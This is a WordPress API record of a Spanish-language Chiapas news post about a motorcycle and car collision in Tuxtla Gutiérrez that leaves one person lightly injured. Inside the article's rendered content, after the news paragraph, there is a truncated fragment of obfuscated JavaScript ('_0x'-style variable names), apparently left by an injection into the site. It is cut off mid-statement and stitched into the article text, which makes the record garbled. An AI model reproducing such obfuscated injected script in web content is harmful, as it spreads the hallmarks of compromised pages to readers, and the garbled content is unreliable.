{"id":14932,"date":"2024-04-04T00:59:56","date_gmt":"2024-04-04T00:59:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14932"},"modified":"2024-04-04T00:59:56","modified_gmt":"2024-04-04T00:59:56","slug":"choca-motociclista-y-particular-en-la-colonia-obrera","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14932","title":{"rendered":"Choca motociclista y particular en la Colonia Obrera"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712192326647-1024x768.jpg\" alt=\"\" class=\"wp-image-14933\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712192326647-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712192326647-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712192326647-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712192326647.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 3 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Da\u00f1os materiales y un herido fue el saldo de un accidente de tr\u00e1nsito ocurrido este mi\u00e9rcoles a la altura de la 9a Sur y 7a Oriente.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una moto Italika de color rojo colision\u00f3 contra un Vw Derby de color blanco.Al lugar arribaron peritos de tr\u00e1nsito e informaron que, la conductora del VW circulaba de Sur a Norte y al llegar al cruce no respet\u00f3 la preferencia haciendo corte de circulaci\u00f3n.Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal y descartaron lesiones de gravedad.En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 3 de abril del 2024. Tuxtla Guti\u00e9rrez. &#8211; Da\u00f1os materiales y un herido fue el saldo de un accidente de tr\u00e1nsito ocurrido este mi\u00e9rcoles a la altura de la 9a Sur y 7a Oriente.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una moto Italika de color rojo colision\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14933,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14932","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14932","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14932"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14932\/revisions"}],"predecessor-version":[{"id":14934,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14932\/revisions\/14934"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14933"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14932"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14932"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14932"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}